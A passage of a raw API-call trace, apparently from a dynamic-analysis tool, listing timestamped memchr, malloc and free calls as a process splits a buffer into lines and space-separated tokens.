_MaxCount=0x803) returned 0x3f6823b [0138.062] malloc (_Size=0x74) returned 0x3d66930 [0138.062] free (_Block=0x0) [0138.062] free (_Block=0x0) [0138.062] memchr (_Buf=0x3f6823c, _Val=10, _MaxCount=0x78f) returned 0x3f68259 [0138.062] malloc (_Size=0x1e) returned 0x3d801c0 [0138.062] free (_Block=0x0) [0138.062] free (_Block=0x0) [0138.062] memchr (_Buf=0x3f6825a, _Val=10, _MaxCount=0x771) returned 0x3f68297 [0138.063] malloc (_Size=0x3e) returned 0x3e22038 [0138.063] free (_Block=0x0) [0138.063] free (_Block=0x0) [0138.063] memchr (_Buf=0x3f68298, _Val=10, _MaxCount=0x733) returned 0x3f682a6 [0138.063] malloc (_Size=0xf) returned 0x3648e30 [0138.063] free (_Block=0x0) [0138.063] free (_Block=0x0) [0138.063] memchr (_Buf=0x3f682a7, _Val=10, _MaxCount=0x724) returned 0x3f682c8 [0138.063] malloc (_Size=0x22) returned 0x60dcd8 [0138.063] free (_Block=0x0) [0138.063] free (_Block=0x0) [0138.063] memchr (_Buf=0x3f682c9, _Val=10, _MaxCount=0x702) returned 0x3f6832f [0138.063] malloc (_Size=0x67) returned 0x60b3f0 [0138.063] free (_Block=0x0) [0138.063] free (_Block=0x0) [0138.063] memchr (_Buf=0x3f68330, _Val=10, _MaxCount=0x69b) returned 0x3f68339 [0138.063] malloc (_Size=0xa) returned 0x3648ea8 [0138.063] free (_Block=0x0) [0138.063] free (_Block=0x0) [0138.063] memchr (_Buf=0x3f6833a, _Val=10, _MaxCount=0x691) returned 0x3f68358 [0138.063] malloc (_Size=0x1f) returned 0x3d802b0 [0138.063] free (_Block=0x0) [0138.064] free (_Block=0x0) [0138.064] memchr (_Buf=0x3f68359, _Val=10, _MaxCount=0x672) returned 0x3f68399 [0138.064] malloc (_Size=0x41) returned 0x3deff40 [0138.064] free (_Block=0x0) [0138.064] free (_Block=0x0) [0138.064] memchr (_Buf=0x3f6839a, _Val=10, _MaxCount=0x631) returned 0x3f683da [0138.064] malloc (_Size=0x41) returned 0x3defa90 [0138.064] free (_Block=0x0) [0138.064] free (_Block=0x0) [0138.064] memchr (_Buf=0x3f683db, _Val=10, _MaxCount=0x5f0) returned 0x3f68417 [0138.064] malloc (_Size=0x3d) returned 0x3e22620 [0138.064] free (_Block=0x0) [0138.064] malloc (_Size=0x540) returned 0x3def350 [0138.064] free (_Block=0x3dd3d50) [0138.064] free (_Block=0x0) [0138.064] memchr (_Buf=0x3f68418, _Val=10, _MaxCount=0x5b3) returned 0x3f68434 [0138.064] malloc (_Size=0x1d) returned 0x3d80300 [0138.064] free (_Block=0x0) [0138.064] free (_Block=0x0) [0138.064] memchr (_Buf=0x3f68435, _Val=10, _MaxCount=0x596) returned 0x3f68440 [0138.064] malloc (_Size=0xc) returned 0x3648d88 [0138.064] free (_Block=0x0) [0138.064] free (_Block=0x0) [0138.065] memchr (_Buf=0x3f68441, _Val=10, _MaxCount=0x58a) returned 0x3f6845f [0138.065] malloc (_Size=0x1f) returned 0x3d801e8 [0138.065] free (_Block=0x0) [0138.065] free (_Block=0x0) [0138.065] memchr (_Buf=0x3f68460, _Val=10, _MaxCount=0x56b) returned 0x3f684a0 [0138.065] malloc (_Size=0x41) returned 0x3df0030 [0138.065] free (_Block=0x0) [0138.065] free (_Block=0x0) [0138.065] memchr (_Buf=0x3f684a1, _Val=10, _MaxCount=0x52a) returned 0x3f684e1 [0138.065] malloc (_Size=0x41) returned 0x3def9f0 [0138.065] free (_Block=0x0) [0138.065] free (_Block=0x0) [0138.065] memchr (_Buf=0x3f684e2, _Val=10, _MaxCount=0x4e9) returned 0x3f6851e [0138.065] malloc (_Size=0x3d) returned 0x3e22470 [0138.065] free (_Block=0x0) [0138.065] free (_Block=0x0) [0138.065] memchr (_Buf=0x3f6851f, _Val=10, _MaxCount=0x4ac) returned 0x3f6853b [0138.065] malloc (_Size=0x1d) returned 0x3d80198 [0138.065] free (_Block=0x0) [0138.065] free (_Block=0x0) [0138.065] memchr (_Buf=0x3f6853c, _Val=10, _MaxCount=0x48f) returned 0x3f6854f [0138.065] malloc (_Size=0x14) returned 0x3f652c0 [0138.065] free (_Block=0x0) [0138.066] free (_Block=0x0) [0138.066] memchr (_Buf=0x3f68550, _Val=10, _MaxCount=0x47b) returned 0x3f68569 [0138.066] malloc (_Size=0x1a) returned 0x3d80148 [0138.066] free (_Block=0x0) [0138.066] free (_Block=0x0) [0138.066] memchr (_Buf=0x3f6856a, _Val=10, _MaxCount=0x461) returned 0x3f685aa [0138.066] malloc (_Size=0x41) returned 0x3defe00 [0138.066] free (_Block=0x0) [0138.066] free (_Block=0x0) [0138.066] memchr (_Buf=0x3f685ab, _Val=10, _MaxCount=0x420) returned 0x3f685eb [0138.066] malloc (_Size=0x41) returned 0x3defb30 [0138.066] free (_Block=0x0) [0138.066] free (_Block=0x0) [0138.066] memchr (_Buf=0x3f685ec, _Val=10, _MaxCount=0x3df) returned 0x3f68618 [0138.066] malloc (_Size=0x2d) returned 0x3624988 [0138.066] free (_Block=0x0) [0138.066] free (_Block=0x0) [0138.066] memchr (_Buf=0x3f68619, _Val=10, _MaxCount=0x3b2) returned 0x3f68630 [0138.066] malloc (_Size=0x18) returned 0x3f65460 [0138.066] free (_Block=0x0) [0138.066] free (_Block=0x0) [0138.066] memchr (_Buf=0x3f68631, _Val=10, _MaxCount=0x39a) returned 0x3f6864b [0138.066] malloc (_Size=0x1b) returned 0x3d80080 [0138.066] free (_Block=0x0) [0138.067] free (_Block=0x0) [0138.067] memchr (_Buf=0x3f6864c, _Val=10, _MaxCount=0x37f) returned 0x3f68668 [0138.067] malloc (_Size=0x1d) returned 0x3d802d8 [0138.067] free (_Block=0x0) [0138.067] free (_Block=0x0) [0138.067] memchr (_Buf=0x3f68669, _Val=10, _MaxCount=0x362) returned 0x3f686a9 [0138.067] malloc (_Size=0x41) returned 0x3defea0 [0138.067] free (_Block=0x0) [0138.067] free (_Block=0x0) [0138.067] memchr (_Buf=0x3f686aa, _Val=10, _MaxCount=0x321) returned 0x3f686ea [0138.067] malloc (_Size=0x41) returned 0x3defe50 [0138.067] free (_Block=0x0) [0138.067] free (_Block=0x0) [0138.067] memchr (_Buf=0x3f686eb, _Val=10, _MaxCount=0x2e0) returned 0x3f686f7 [0138.067] malloc (_Size=0xd) returned 0x3648d40 [0138.067] free (_Block=0x0) [0138.067] free (_Block=0x0) [0138.067] memchr (_Buf=0x3f686f8, _Val=10, _MaxCount=0x2d3) returned 0x3f68712 [0138.067] malloc (_Size=0x1b) returned 0x3d80328 [0138.067] free (_Block=0x0) [0138.067] free (_Block=0x0) [0138.067] memchr (_Buf=0x3f68713, _Val=10, _MaxCount=0x2b8) returned 0x3f68725 [0138.067] malloc (_Size=0x13) returned 0x3f65340 [0138.067] free (_Block=0x0) [0138.068] free (_Block=0x0) [0138.068] memchr (_Buf=0x3f68726, _Val=10, _MaxCount=0x2a5) returned 0x3f6875b [0138.068] malloc (_Size=0x36) returned 0x36247b0 [0138.068] free (_Block=0x0) [0138.068] free (_Block=0x0) [0138.068] memchr (_Buf=0x3f6875c, _Val=10, _MaxCount=0x26f) returned 0x3f68797 [0138.068] malloc (_Size=0x3c) returned 0x3e22080 [0138.068] free (_Block=0x0) [0138.068] free (_Block=0x0) [0138.068] memchr (_Buf=0x3f68798, _Val=10, _MaxCount=0x233) returned 0x3f687aa [0138.068] malloc (_Size=0x13) returned 0x3f65300 [0138.068] free (_Block=0x0) [0138.068] free (_Block=0x0) [0138.068] memchr (_Buf=0x3f687ab, _Val=10, _MaxCount=0x220) returned 0x3f687c2 [0138.068] malloc (_Size=0x18) returned 0x3f654c0 [0138.068] free (_Block=0x0) [0138.068] free (_Block=0x0) [0138.068] memchr (_Buf=0x3f687c3, _Val=10, _MaxCount=0x208) returned 0x3f687d7 [0138.068] malloc (_Size=0x15) returned 0x3f65280 [0138.068] free (_Block=0x0) [0138.069] free (_Block=0x0) [0138.069] memchr (_Buf=0x3f687d8, _Val=10, _MaxCount=0x1f3) returned 0x3f687ef [0138.069] malloc (_Size=0x18) returned 0x3f65360 [0138.069] free (_Block=0x0) [0138.069] free (_Block=0x0) [0138.069] memchr (_Buf=0x3f687f0, _Val=10, _MaxCount=0x1db) returned 0x3f68803 [0138.069] malloc (_Size=0x14) returned 0x3f65380 [0138.069] free (_Block=0x0) [0138.069] free (_Block=0x0) [0138.069] memchr (_Buf=0x3f68804, _Val=10, _MaxCount=0x1c7) returned 0x3f6881a [0138.069] malloc (_Size=0x17) returned 0x3f651e0 [0138.069] free (_Block=0x0) [0138.069] free (_Block=0x0) [0138.069] memchr (_Buf=0x3f6881b, _Val=10, _MaxCount=0x1b0) returned 0x3f68833 [0138.069] malloc (_Size=0x19) returned 0x3d80260 [0138.069] free (_Block=0x0) [0138.069] free (_Block=0x0) [0138.069] memchr (_Buf=0x3f68834, _Val=10, _MaxCount=0x197) returned 0x3f6883e [0138.069] malloc (_Size=0xb) returned 0x3648db8 [0138.069] free (_Block=0x0) [0138.069] free (_Block=0x0) [0138.069] memchr (_Buf=0x3f6883f, _Val=10, _MaxCount=0x18c) returned 0x3f68859 [0138.069] malloc (_Size=0x1b) returned 0x3d80238 [0138.070] free (_Block=0x0) [0138.070] free (_Block=0x0) [0138.070] memchr (_Buf=0x3f6885a, _Val=10, _MaxCount=0x171) returned 0x3f6886e [0138.070] malloc (_Size=0x15) returned 0x3f65500 [0138.070] free (_Block=0x0) [0138.070] free (_Block=0x0) [0138.070] memchr (_Buf=0x3f6886f, _Val=10, _MaxCount=0x15c) returned 0x3f688d8 [0138.070] malloc (_Size=0x6a) returned 0x60bb78 [0138.070] free (_Block=0x0) [0138.070] free (_Block=0x0) [0138.070] memchr (_Buf=0x3f688d9, _Val=10, _MaxCount=0xf2) returned 0x3f688e9 [0138.070] malloc (_Size=0x11) returned 0x3f654e0 [0138.070] free (_Block=0x0) [0138.070] free (_Block=0x0) [0138.070] memchr (_Buf=0x3f688ea, _Val=10, _MaxCount=0xe1) returned 0x3f68903 [0138.070] malloc (_Size=0x1a) returned 0x3d80350 [0138.070] free (_Block=0x0) [0138.070] free (_Block=0x0) [0138.070] memchr (_Buf=0x3f68904, _Val=10, _MaxCount=0xc7) returned 0x3f68944 [0138.070] malloc (_Size=0x41) returned 0x3df0080 [0138.070] free (_Block=0x0) [0138.070] free (_Block=0x0) [0138.071] memchr (_Buf=0x3f68945, _Val=10, _MaxCount=0x86) returned 0x3f68985 [0138.071] malloc (_Size=0x41) returned 0x3def900 [0138.071] free (_Block=0x0) [0138.071] free (_Block=0x0) [0138.071] memchr (_Buf=0x3f68986, _Val=10, _MaxCount=0x45) returned 0x3f689b2 [0138.071] malloc (_Size=0x2d) returned 0x3624950 [0138.071] free (_Block=0x0) [0138.071] free (_Block=0x0) [0138.071] memchr (_Buf=0x3f689b3, _Val=10, _MaxCount=0x18) returned 0x3f689ca [0138.071] malloc (_Size=0x18) returned 0x3f653e0 [0138.071] free (_Block=0x0) [0138.071] free (_Block=0x0) [0138.071] free (_Block=0x3f68010) [0138.071] memchr (_Buf=0x36249c0, _Val=32, _MaxCount=0x2b) returned 0x36249c6 [0138.071] malloc (_Size=0x7) returned 0x3f4c0b8 [0138.071] free (_Block=0x0) [0138.071] malloc (_Size=0x40) returned 0x3e225d8 [0138.071] free (_Block=0x0) [0138.071] free (_Block=0x0) [0138.071] memchr (_Buf=0x36249c7, _Val=32, _MaxCount=0x24) returned 0x36249cf [0138.071] malloc (_Size=0x9) returned 0x3648e00 [0138.071] free (_Block=0x0) [0138.071] free (_Block=0x0) [0138.072] memchr (_Buf=0x36249d0, _Val=32, _MaxCount=0x1b) returned 0x36249df [0138.072] malloc (_Size=0x10) returned 0x3648ec0 [0138.072] free (_Block=0x0) [0138.072] free (_Block=0x0) [0138.072] memchr (_Buf=0x36249e0, _Val=32, _MaxCount=0xb) returned 0x36249e4 [0138.072] malloc (_Size=0x5) returned 0x3f4bf68 [0138.072] free (_Block=0x0) [0138.072] free (_Block=0x0) [0138.072] memchr (_Buf=0x36249e5, _Val=32, _MaxCount=0x6) returned 0x36249e6 [0138.072] malloc (_Size=0x2) returned 0x3f4bf98 [0138.072] free (_Block=0x0) [0138.072] malloc (_Size=0x140) returned 0x3dd3e98 [0138.072] free (_Block=0x3e225d8) [0138.072] free (_Block=0x0) [0138.072] memchr (_Buf=0x36249e7, _Val=32, _MaxCount=0x4) returned 0x0 [0138.072] malloc (_Size=0x5) returned 0x3f4bfd8 [0138.072] free (_Block=0x0) [0138.072] free (_Block=0x0) [0138.072] free (_Block=0x3f4c0b8) [0138.072] free (_Block=0x3648e00) [0138.072] free (_Block=0x3648ec0) [0138.073] free (_Block=0x3f4bf68) [0138.073] free (_Block=0x3f4bf98) [0138.073] free (_Block=0x3f4bfd8) [0138.073] free (_Block=0x3dd3e98) [0138.073] memchr (_Buf=0x3f653c0, _Val=32, _MaxCount=0x10) returned 0x0 [0138.073] malloc (_Size=0x11) returned 0x3f65520 [0138.073] free (_Block=0x0) [0138.073] malloc (_Size=0x40) returned 0x3e22110 [0138.073] free (_Block=0x0) [0138.073] free (_Block=0x0) [0138.073] free (_Block=0x3f65520) [0138.073] free (_Block=0x3e22110) [0138.073] memchr (_Buf=0x3d800d0, _Val=32, _MaxCount=0x1c) returned 0x3d800da [0138.073] malloc (_Size=0xb) returned 0x3648cb0 [0138.073] free (_Block=0x0) [0138.073] malloc (_Size=0x40) returned 0x3e22110 [0138.073] free (_Block=0x0) [0138.073] free (_Block=0x0) [0138.073] memchr (_Buf=0x3d800db, _Val=32, _MaxCount=0x11) returned 0x3d800e2 [0138.073] malloc (_Size=0x8) returned 0x3f4bfd8 [0138.073] free (_Block=0x0) [0138.073] free (_Block=0x0) [0138.073] memchr (_Buf=0x3d800e3, _Val=32, _MaxCount=0x9) returned 0x0 [0138.073] malloc (_Size=0xa) returned 0x3648e48 [0138.074] free (_Block=0x0) [0138.074] free (_Block=0x0) [0138.074] free (_Block=0x3648cb0) [0138.074] free (_Block=0x3f4bfd8) [0138.074] free (_Block=0x3648e48) [0138.074] free (_Block=0x3e22110) [0138.074] memchr (_Buf=0x3defdb0, _Val=32, _MaxCount=0x40) returned 0x0 [0138.074] malloc (_Size=0x41) returned 0x3defef0 [0138.074] free (_Block=0x0) [0138.074] malloc (_Size=0x40) returned 0x3e22668 [0138.074] free (_Block=0x0) [0138.074] free (_Block=0x0) [0138.074] free (_Block=0x3defef0) [0138.074] free (_Block=0x3e22668) [0138.074] memchr (_Buf=0x3defd60, _Val=32, _MaxCount=0x40) returned 0x0 [0138.074] malloc (_Size=0x41) returned 0x3defef0 [0138.074] free (_Block=0x0) [0138.074] malloc (_Size=0x40) returned 0x3e22428 [0138.074] free (_Block=0x0) [0138.074] free (_Block=0x0) [0138.074] free (_Block=0x3defef0) [0138.074] free (_Block=0x3e22428) [0138.074] memchr (_Buf=0x3e22548, _Val=32, _MaxCount=0x3c) returned 0x0 [0138.075] malloc (_Size=0x3d) returned 0x3e22110 [0138.075] free (_Block=0x0) [0138.075] malloc (_Size=0x40) returned 0x3e226f8 [0138.075] free (_Block=0x0) [0138.075] free (_Block=0x0) [0138.075] free (_Block=0x3e22110) [0138.075] free (_Block=0x3e226f8) [0138.075] memchr (_Buf=0x3d803f0, _Val=32, _MaxCount=0x1a) returned 0x3d803f8 [0138.075] malloc (_Size=0x9) returned 0x3648cf8 [0138.075] free (_Block=0x0) [0138.075] malloc (_Size=0x40) returned 0x3e22590 [0138.075] free (_Block=0x0) [0138.075] free (_Block=0x0) [0138.075] memchr (_Buf=0x3d803f9, _Val=32, _MaxCount=0x11) returned 0x3d80400 [0138.075] malloc (_Size=0x8) returned 0x3f4c0c8 [0138.075] free (_Block=0x0) [0138.075] free (_Block=0x0) [0138.075] memchr (_Buf=0x3d80401, _Val=32, _MaxCount=0x9) returned 0x0 [0138.075] malloc (_Size=0xa) returned 0x3648de8 [0138.075] free (_Block=0x0) [0138.075] free (_Block=0x0) [0138.075] free (_Block=0x3648cf8) [0138.075] free (_Block=0x3f4c0c8) [0138.075] free (_Block=0x3648de8) [0138.076] free (_Block=0x3e22590) [0138.076] memchr (_Buf=0x3e220c8, _Val=32, _MaxCount=0x3e) returned 0x3e220da [0138.076] malloc (_Size=0x13) returned 0x3f65520 [0138.076] free (_Block=0x0) [0138.076] malloc (_Size=0x40) returned 0x3e22590 [0138.076] free (_Block=0x0) [0138.076] free (_Block=0x0) [0138.076] memchr (_Buf=0x3e220db, _Val=32, _MaxCount=0x2b) returned 0x0 [0138.076] malloc (_Size=0x2c) returned 0x36248e0 [0138.076] free (_Block=0x0) [0138.076] free (_Block=0x0) [0138.076] free (_Block=0x3f65520) [0138.076] free (_Block=0x36248e0) [0138.076] free (_Block=0x3e22590) [0138.076] memchr (_Buf=0x60dd98, _Val=32, _MaxCount=0x25) returned 0x60dda2 [0138.076] malloc (_Size=0xb) returned 0x3648de8 [0138.076] free (_Block=0x0) [0138.076] malloc (_Size=0x40) returned 0x3e222c0 [0138.076] free (_Block=0x0) [0138.076] free (_Block=0x0) [0138.076] memchr (_Buf=0x60dda3, _Val=32, _MaxCount=0x1a) returned 0x0 [0138.076] malloc (_Size=0x1b) returned 0x3d803c8 [0138.076] free (_Block=0x0) [0138.077] free (_Block=0x0) [0138.077] free (_Block=0x3648de8) [0138.077] free (_Block=0x3d803c8) [0138.077] free (_Block=0x3e222c0) [0138.077] memchr (_Buf=0x3d80120, _Val=32, _MaxCount=0x1e) returned 0x3d80128 [0138.077] malloc (_Size=0x9) returned 0x3648e48 [0138.077] free (_Block=0x0) [0138.077] malloc (_Size=0x40) returned 0x3e222c0 [0138.077] free (_Block=0x0) [0138.077] free (_Block=0x0) [0138.077] memchr (_Buf=0x3d80129, _Val=32, _MaxCount=0x15) returned 0x3d8012c [0138.077] malloc (_Size=0x4) returned 0x3f4bf38 [0138.077] free (_Block=0x0) [0138.077] free (_Block=0x0) [0138.077] memchr (_Buf=0x3d8012d, _Val=32, _MaxCount=0x11) returned 0x3d80135 [0138.077] malloc (_Size=0x9) returned 0x3648e90 [0138.077] free (_Block=0x0) [0138.077] free (_Block=0x0) [0138.077] memchr (_Buf=0x3d80136, _Val=32, _MaxCount=0x8) returned 0x3d80138 [0138.077] malloc (_Size=0x3) returned 0x3f4c048 [0138.077] free (_Block=0x0) [0138.077] free (_Block=0x0) [0138.077] memchr (_Buf=0x3d80139, _Val=32, _MaxCount=0x5) returned 0x0 [0138.077] malloc (_Size=0x6) returned 0x3f4bff8 [0138.078] free (_Block=0x0) [0138.078] malloc (_Size=0x140) returned 0x3dd4128 [0138.078] free (_Block=0x3e222c0) [0138.078] free (_Block=0x0) [0138.078] free (_Block=0x3648e48) [0138.078] free (_Block=0x3f4bf38) [0138.078] free (_Block=0x3648e90) [0138.078] free (_Block=0x3f4c048) [0138.078] free (_Block=0x3f4bff8) [0138.078] free (_Block=0x3dd4128) [0138.078] memchr (_Buf=0x3d66930, _Val=32, _MaxCount=0x73) returned 0x3d66935 [0138.078] malloc (_Size=0x6) returned 0x3f4bf18 [0138.078] free (_Block=0x0) [0138.078] malloc (_Size=0x40) returned 0x3e22500 [0138.078] free (_Block=0x0) [0138.078] free (_Block=0x0) [0138.078] memchr (_Buf=0x3d66936, _Val=32, _MaxCount=0x6d) returned 0x3d6693e [0138.078] malloc (_Size=0x9) returned 0x3648da0 [0138.078] free (_Block=0x0) [0138.078] free (_Block=0x0) [0138.078] memchr (_Buf=0x3d6693f, _Val=32, _MaxCount=0x64) returned 0x3d66947 [0138.078] malloc (_Size=0x9) returned 0x3648cc8 [0138.078] free (_Block=0x0) [0138.079] free (_Block=0x0) [0138.079] memchr (_Buf=0x3d66948, _Val=32, _MaxCount=0x5b) returned 0x3d66954 [0138.079] malloc (_Size=0xd) returned 0x3648de8 [0138.079] free (_Block=0x0) [0138.079] free (_Block=0x0) [0138.079] memchr (_Buf=0x3d66955, _Val=32, _MaxCount=0x4e) returned 0x3d6695e [0138.079] malloc (_Size=0xa) returned 0x3648e00 [0138.079] free (_Block=0x0) [0138.079] malloc (_Size=0x140) returned 0x3dd3c08 [0138.079] free (_Block=0x3e22500) [0138.079] free (_Block=0x0) [0138.079] memchr (_Buf=0x3d6695f, _Val=32, _MaxCount=0x44) returned 0x3d6696a [0138.079] malloc (_Size=0xc) returned 0x3648ec0 [0138.079] free (_Block=0x0) [0138.079] free (_Block=0x0) [0138.079] memchr (_Buf=0x3d6696b, _Val=32, _MaxCount=0x38) returned 0x3d66975 [0138.079] malloc (_Size=0xb) returned 0x3648f38 [0138.079] free (_Block=0x0) [0138.079] free (_Block=0x0) [0138.079] memchr (_Buf=0x3d66976, _Val=32, _MaxCount=0x2d) returned 0x3d6697e [0138.079] malloc (_Size=0x9) returned 0x3648e18 [0138.079] free (_Block=0x0) [0138.079] free (_Block=0x0) [0138.079] memchr (_Buf=0x3d6697f, _Val=32, _MaxCount=0x24) returned 0x3d6698b [0138.080] malloc (_Size=0xd) returned 0x3648e48 [0138.080] free (_Block=0x0) [0138.080] free (_Block=0x0) [0138.080] memchr (_Buf=0x3d6698c, _Val=32, _MaxCount=0x17) returned 0x3d66999 [0138.080] malloc (_Size=0xe) returned 0x3648c98 [0138.080] free (_Block=0x0) [0138.080] free (_Block=0x0) [0138.080] memchr (_Buf=0x3d6699a, _Val=32, _MaxCount=0x9) returned 0x0 [0138.080] malloc (_Size=0xa) returned 0x3648e78 [0138.080] free (_Block=0x0) [0138.080] free (_Block=0x0) [0138.080] free (_Block=0x3f4bf18) [0138.080] free (_Block=0x3648da0) [0138.080] free (_Block=0x3648cc8) [0138.080] free (_Block=0x3648de8) [0138.080] free (_Block=0x3648e00) [0138.080] free (_Block=0x3648ec0) [0138.080] free (_Block=0x3648f38) [0138.080] free (_Block=0x3648e18) [0138.080] free (_Block=0x3648e48) [0138.080] free (_Block=0x3648c98) [0138.080] free (_Block=0x3648e78) [0138.080] free (_Block=0x3dd3c08) [0138.080] memchr (_Buf=0x3d801c0, _Val=32, _MaxCount=0x1d) returned 0x3d801c9 [0138.080] malloc (_Size=0xa) returned 0x3648da0 [0138.081] free (_Block=0x0) [0138.081] malloc (_Size=0x40) returned 0x3e22668 [0138.081] free (_Block=0x0) [0138.081] free (_Block=0x0) [0138.081] memchr (_Buf=0x3d801ca, _Val=32, _MaxCount=0x13) returned 0x3d801d4 [0138.081] malloc (_Size=0xb) returned 0x3648c68 [0138.081] free (_Block=0x0) [0138.081] free (_Block=0x0) [0138.081] memchr (_Buf=0x3d801d5, _Val=32, _MaxCount=0x8) returned 0x0 [0138.081] malloc (_Size=0x9) returned 0x3648de8 [0138.081] free (_Block=0x0) [0138.081] free (_Block=0x0) [0138.081] free (_Block=0x3648da0) [0138.081] free (_Block=0x3648c68) [0138.081] free (_Block=0x3648de8) [0138.081] free (_Block=0x3e22668) [0138.081] memchr (_Buf=0x3e22038, _Val=32, _MaxCount=0x3d) returned 0x3e22043 [0138.081] malloc (_Size=0xc) returned 0x3648de8 [0138.081] free (_Block=0x0) [0138.081] malloc (_Size=0x40) returned 0x3e22110 [0138.081] free (_Block=0x0) [0138.081] free (_Block=0x0) [0138.081] memchr (_Buf=0x3e22044, _Val=32, _MaxCount=0x31) returned 0x3e22048 [0138.081] malloc (_Size=0x5) returned 0x3f4bff8 [0138.082] free (_Block=0x0) [0138.082] free (_Block=0x0) [0138.082] memchr (_Buf=0x3e22049, _Val=32, _MaxCount=0x2c) returned 0x3e2204d [0138.082] malloc (_Size=0x5) returned 0x3f4bfe8 [0138.082] free (_Block=0x0) [0138.082] free (_Block=0x0) [0138.082] memchr (_Buf=0x3e2204e, _Val=32, _MaxCount=0x27) returned 0x3e22052 [0138.082] malloc (_Size=0x5) returned 0x3f4bf58 [0138.082] free (_Block=0x0) [0138.082] free (_Block=0x0) [0138.082] memchr (_Buf=0x3e22053, _Val=32, _MaxCount=0x22) returned 0x3e22057 [0138.082] malloc (_Size=0x5) returned 0x3f4c078 [0138.082] free (_Block=0x0) [0138.082] malloc (_Size=0x140) returned 0x3dd4128 [0138.082] free (_Block=0x3e22110) [0138.082] free (_Block=0x0) [0138.082] memchr (_Buf=0x3e22058, _Val=32, _MaxCount=0x1d) returned 0x3e2205c [0138.082] malloc (_Size=0x5) returned 0x3f4c0b8 [0138.082] free (_Block=0x0) [0138.082] free (_Block=0x0) [0138.082] memchr (_Buf=0x3e2205d, _Val=32, _MaxCount=0x18) returned 0x3e22061 [0138.082] malloc (_Size=0x5) returned 0x3f4bf98 [0138.083] free (_Block=0x0) [0138.083] free (_Block=0x0) [0138.083] memchr (_Buf=0x3e22062, _Val=32, _MaxCount=0x13) returned 0x3e22066 [0138.083] malloc (_Size=0x5) returned 0x3f4bfb8 [0138.083] free (_Block=0x0) [0138.083] free (_Block=0x0) [0138.083] memchr (_Buf=0x3e22067, _Val=32, _MaxCount=0xe) returned 0x3e2206b [0138.083] malloc (_Size=0x5) returned 0x3f4bf48 [0138.083] free (_Block=0x0) [0138.083] free (_Block=0x0) [0138.083] memchr (_Buf=0x3e2206c, _Val=32, _MaxCount=0x9) returned 0x3e22070 [0138.083] malloc (_Size=0x5) returned 0x3f4c0c8 [0138.083] free (_Block=0x0) [0138.083] free (_Block=0x0) [0138.083] memchr (_Buf=0x3e22071, _Val=32, _MaxCount=0x4) returned 0x0 [0138.083] malloc (_Size=0x5) returned 0x3f4c058 [0138.083] free (_Block=0x0) [0138.083] free (_Block=0x0) [0138.083] free (_Block=0x3648de8) [0138.083] free (_Block=0x3f4bff8) [0138.083] free (_Block=0x3f4bfe8) [0138.083] free (_Block=0x3f4bf58) [0138.084] free (_Block=0x3f4c078) [0138.084] free (_Block=0x3f4c0b8) [0138.084] free (_Block=0x3f4bf98) [0138.084] free (_Block=0x3f4bfb8) [0138.084] free (_Block=0x3f4bf48) [0138.084] free (_Block=0x3f4c0c8) [0138.084] free (_Block=0x3f4c058) [0138.084] free (_Block=0x3dd4128) [0138.084] memchr (_Buf=0x3648e30, _Val=32, _MaxCount=0xe) returned 0x3648e36 [0138.084] malloc (_Size=0x7) returned 0x3f4c078 [0138.084] free (_Block=0x0) [0138.084] malloc (_Size=0x40) returned 0x3e22110 [0138.084] free (_Block=0x0) [0138.084] free (_Block=0x0) [0138.084] memchr (_Buf=0x3648e37, _Val=32, _MaxCount=0x7) returned 0x0 [0138.084] malloc (_Size=0x8) returned 0x3f4c008 [0138.084] free (_Block=0x0) [0138.084] free (_Block=0x0) [0138.084] free (_Block=0x3f4c078) [0138.084] free (_Block=0x3f4c008) [0138.084] free (_Block=0x3e22110) [0138.084] memchr (_Buf=0x60dcd8, _Val=32, _MaxCount=0x21) returned 0x60dce1 [0138.084] malloc (_Size=0xa) returned 0x3648f20 [0138.084] free (_Block=0x0) [0138.085] malloc (_Size=0x40) returned 0x3e22668 [0138.085] free (_Block=0x0) [0138.085] free (_Block=0x0) [0138.085] memchr (_Buf=0x60dce2, _Val=32, _MaxCount=0x17) returned 0x60dce9 [0138.085] malloc (_Size=0x8) returned 0x3f4bf88 [0138.086] free (_Block=0x0) [0138.086] free (_Block=0x0) [0138.086] memchr (_Buf=0x60dcea, _Val=32, _MaxCount=0xf) returned 0x60dcf1 [0138.086] malloc (_Size=0x8) returned 0x3f4c058 [0138.086] free (_Block=0x0) [0138.086] free (_Block=0x0) [0138.086] memchr (_Buf=0x60dcf2, _Val=32, _MaxCount=0x7) returned 0x0 [0138.086] malloc (_Size=0x8) returned 0x3f4c0e8 [0138.086] free (_Block=0x0) [0138.086] free (_Block=0x0) [0138.086] free (_Block=0x3648f20) [0138.086] free (_Block=0x3f4bf88) [0138.087] free (_Block=0x3f4c058) [0138.087] free (_Block=0x3f4c0e8) [0138.087] free (_Block=0x3e22668) [0138.087] memchr (_Buf=0x60b3f0, _Val=32, _MaxCount=0x66) returned 0x60b401 [0138.087] malloc (_Size=0x12) returned 0x3f65520 [0138.087] free (_Block=0x0) [0138.087] malloc (_Size=0x40) returned 0x3e22308 [0138.087] free (_Block=0x0) [0138.087] free (_Block=0x0) [0138.087] memchr (_Buf=0x60b402, _Val=32, _MaxCount=0x54) returned 0x60b42a [0138.087] malloc (_Size=0x29) returned 0x3624ad8 [0138.087] free (_Block=0x0) [0138.087] free (_Block=0x0) [0138.087] memchr (_Buf=0x60b42b, _Val=32, _MaxCount=0x2b) returned 0x0 [0138.087] malloc (_Size=0x2c) returned 0x36248e0 [0138.087] free (_Block=0x0) [0138.087] free (_Block=0x0) [0138.087] free (_Block=0x3f65520) [0138.087] free (_Block=0x3624ad8) [0138.087] free (_Block=0x36248e0) [0138.087] free (_Block=0x3e22308) [0138.087] memchr (_Buf=0x3648ea8, _Val=32, _MaxCount=0x9) returned 0x0 [0138.087] malloc (_Size=0xa) returned 0x3648d28 [0138.087] free (_Block=0x0) [0138.088] malloc (_Size=0x40) returned 0x3e22590 [0138.088] free (_Block=0x0) [0138.088] free (_Block=0x0) [0138.088] free (_Block=0x3648d28) [0138.088] free (_Block=0x3e22590) [0138.088] memchr (_Buf=0x3d802b0, _Val=32, _MaxCount=0x1e) returned 0x3d802ba [0138.088] malloc (_Size=0xb) returned 0x3648ec0 [0138.088] free (_Block=0x0) [0138.088] malloc (_Size=0x40) returned 0x3e22230 [0138.088] free (_Block=0x0) [0138.088] free (_Block=0x0) [0138.088] memchr (_Buf=0x3d802bb, _Val=32, _MaxCount=0x13) returned 0x3d802be [0138.088] malloc (_Size=0x4) returned 0x3f4bff8 [0138.088] free (_Block=0x0) [0138.088] free (_Block=0x0) [0138.088] memchr (_Buf=0x3d802bf, _Val=32, _MaxCount=0xf) returned 0x3d802c5 [0138.088] malloc 